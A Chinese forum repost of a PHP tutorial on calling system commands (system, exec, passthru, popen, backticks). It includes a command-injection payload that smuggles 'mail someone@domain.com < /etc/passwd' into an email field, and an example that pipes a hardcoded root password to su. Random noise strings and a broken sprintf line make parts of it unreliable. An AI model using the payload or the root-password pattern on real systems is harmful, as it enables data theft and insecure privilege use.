QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2274|回复: 0
打印 上一主题 下一主题

在PHP中执行系统外部命令

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-16 11:34 |只看该作者 |正序浏览
|招呼Ta 关注Ta

作者:Fluke 中文PHP论坛

8 m2 V4 k% }6 L/ i: c

  PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。

7 p' Y% T2 G( J& \( Y/ y, M) X

  那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你看了本文后,肯定能够回答这些问题了。

: c' g5 \( z3 {0 U

  是否可以?

0 [/ ?2 Y& V; t$ u* i$ @

  答案是肯定的。PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。

/ E, ~( t5 u9 b, L+ {; A4 e

  前提条件

$ J0 A; `4 T2 {

  由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安全模式。如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制:

\2 n. b. I/ }1 N% E

  执行外部命令

* E( C8 ~3 I7 v3 ~$ H5 P

  在打开文件时有些限制

N# U3 X$ i: Z. d, \

  连接MySQL数据库

" ^ _& h5 _/ O8 S

  基于HTTP的认证

/ }3 R" R2 K; f: g7 x

  在安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令,或在编译PHP是加上--with-exec-dir选项来指定,默认是/usr/local/php/bin。

; f' {7 |, m! m/ {: ^$ e- T7 }

  如果你调用一个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是一片空白,那么很可能你的网管已经把PHP运行在安全模式下了。

. e4 b$ {1 j* U7 z$ h

  如何做?

$ p; y) a' J) V

  在PHP中调用外部命令,可以用如下三种方法来实现:

( d* @) b: o3 T

  1) 用PHP提供的专门函数

! N8 E: a* r! y1 V# `

  PHP提供共了3个专门的执行外部命令的函数:system(),exec(),passthru()。

& n* J" T1 s5 D0 c3 W9 f8 h3 o

  system()

6 i/ Z3 W; A$ T$ z8 D! d; G S

  原型:string system (string command [, int return_var])

! }: X' e+ x( @- O

  system()函数很其它语言中的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。

: M9 R6 K \ S0 a/ _7 N2 ?

  例子:

/ i' M, Y. X* a0 }# a

  <?

% s& u* Y5 l5 X+ g" V6 o. O# r

  system("/usr/local/bin/webalizer/webalizer");

0 ]; R% f5 [/ \! I+ u

  ?>

# E9 h7 k1 E8 g: _! Z; W

  exec()

# B- c/ Z, v6 [& y

  原型:string exec (string command [, string array [, int return_var]])

* s" ?# @0 w7 `) U1 N

  exec()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array可以得到完整的结果,方法是把结果逐行追加到array的结尾处。所以如果array不是空的,在调用之前最好用unset()最它清掉。只有指定了第二个参数时,才可以用第三个参数,用来取得命令执行的状态码。

0 G2 p6 R7 V+ O2 S# Z l

  例子:

q' q+ O! V x$ i* B& ~2 p* ~

  <?

5 U$ N6 Z$ C& g6 @% n, p

  exec("/bin/ls -l");

1 y( y Y9 v7 e4 K: K

  exec("/bin/ls -l", $res);

4 }* x: r! }6 `

  #$res是一个数据,每个元素代表结果的一行

& R$ V- |) Z: ^4 {

  exec("/bin/ls -l", $res, $rc);

; C) k3 Q, z/ {: f

  #$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0

% x- C3 R- H: {, [$ \' f- h

  ?>

* W& q, {3 ], W$ k

  passthru()

; }: h% e0 Q, b3 ~) X. M

  原型:void passthru (string command [, int return_var])

! Z' D- F6 _+ t# R

  passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus(Unix下的一个处理图片的工具,输出二进制的原始图片的流)这样的程序。同样它也可以得到命令执行的状态码。

6 `* m/ U5 Q8 z

  例子:

. \0 Q6 S8 ~4 s

  <?

6 w/ c+ @1 z: p g" P+ t& l; D

  header("Content-type: image/gif");

! C; j) i: m8 e: S }

  passthru("./ppmtogif hunte.ppm");

1 [4 a3 \% N/ V4 o9 q9 m. m

  ?>

1 K2 [& y0 k8 T# }6 ]

  2) 用popen()函数打开进程

5 n; z7 z5 Q% T' f: P0 S) c, f

  上面的方法只能简单地执行命令,却不能与命令交互。但有些时候必须向命令输入一些东西,如在增加Linux的系统用户时,要调用su来把当前用户换到root才行,而su命令必须要在命令行上输入root的密码。这种情况下,用上面提到的方法显然是不行的。

0 Z8 h+ n0 K& Q" M# o: x

  popen()函数打开一个进程管道来执行给定的命令,返回一个文件句柄。既然返回的是一个文件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单一的操作模式,要么写,要么读;从PHP4开始,可以同时读和写了。除非这个句柄是以一种模式(读或写)打开的,否则必须调用pclose()函数来关闭它。

+ R! v; M: k$ Q: Z/ }

  例子1:

) x# U2 ^* x- J: @. @* Z w X0 k) e

  <?

/ Y7 S, x, G) [5 f7 q% T

  $fp=popen("/bin/ls -l", "r");

" o, d& I' [, @, z# M

  ?>

4 F T; I6 V3 f/ K- \% a

  例子2(本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51):

7 q' ?' w. o0 u% |# O

  <?

! a# ^- T ?2 l5 U$ M' d/ D4 {. C) Z

  /* PHP中如何增加一个系统用户

; i0 L# x1 a0 n( {4 _+ o

  下面是一段例程,增加一个名字为james的用户,

) u7 j& T) o1 f% y% v$ I- T8 q* K; @

  root密码是 verygood。仅供参考

1 a' w2 R0 v+ m# Z# \1 I2 l' D9 V

  */

- J1 q9 x8 f9 x! G2 a

  $sucommand = "su --login root --command";

" L! m1 w9 N, w; e

  $useradd = "useradd ";

# F( V" O* B3 x4 U

  $rootpasswd = "verygood";

6 S3 o0 [9 u6 M2 p+ f

  $user = "james";

4 O8 R" u* z" {. V, g+ _) h! b

  $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);

6 ^/ L1 x2 d, f' m% i. e+ N4 c

  $fp = @popen($user_add,"w");

" |( v. t7 r' J7 L- |

  @fputs($fp,$rootpasswd);

: B3 a) i2 u0 n' S2 J0 W) A

  @pclose($fp);

& q1 t! g0 G, c; J

  ?>

" m6 o, D! g" w( h4 x

  3) 用反撇号(`,也就是键盘上ESC键下面的那个,和~在同一个上面)

. {2 E$ F3 Q; P

  这个方法以前没有归入PHP的文档,是作为一个秘技存在的。方法很简单,用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。如:

/ N3 V9 z2 q5 I6 f9 Z, D3 z/ R3 }

  <?

. h5 g' k( Y2 }9 o. B

  $res=`/bin/ls -l`;

5 G: I7 e4 r; |( C1 t( X4 o

  echo '<b><pre>'.$res.'</pre></b>';

7 A k* e* B. a0 O) N

  ?>

& T6 f6 O. ?- U! p& e' |; a

  这个脚本的输出就象:

0 M/ N0 ]6 e- R- V; E \4 e B

  hunte.gif

f& K# F8 p7 @6 k; m. k: B6 H+ R8 R, Y

  hunte.ppm

. V/ \, y, @/ Y, m% e9 d

  jpg.htm

2 Z7 |7 e' Z2 o+ X& b0 D7 j/ D

  jpg.jpg

- |# H: s8 T/ D! \" _

  passthru.php

5 G+ E$ h$ R4 W6 X/ f5 ^

  要考虑些什么?

5 n' u" e5 D( @, H1 x5 l

  要考虑两个问题:安全性和超时。

5 T- K) Z" c3 V% z/ c4 u, {( N* D

  先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样:

3 O% H, X- W) P3 P. p, ^

  <?

" E8 Z0 D/ n4 G" {

  system("mail $to < products.txt");

" ^9 ~5 h3 L% t

  echo "我们的产品目录已经发送到你的信箱:$to";

% z. N1 K: E C# v- q6 {% p

  ?>

/ I: y0 i/ c9 T$ K' d1 Z

  用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址:

7 t6 Y# c' }6 t$ {6 A/ [; F

  '--bla ; mail someone@domain.com < /etc/passwd ;'

* y" P! E U, G9 Z% O8 ?

  那么这条命令最终变成:

1 |+ z; b# Q, Z

  'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'

! e+ a- I/ N+ P5 j

  我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。

, q& i: c9 l+ i4 C

  幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。

% a, y$ S1 \" Z9 k

  再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:

8 M f$ J7 `* E# _9 e t

  <? ; V# K7 R) n/ L2 h. ^  system("/usr/local/bin/order_proc > /tmp/null &"); 5 J! @: V" l( }. M  ?>' m5 Q" k7 d8 K; ]' `6 n% s0 n& v

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-19 16:21 , Processed in 0.443005 second(s), 53 queries .

回顶部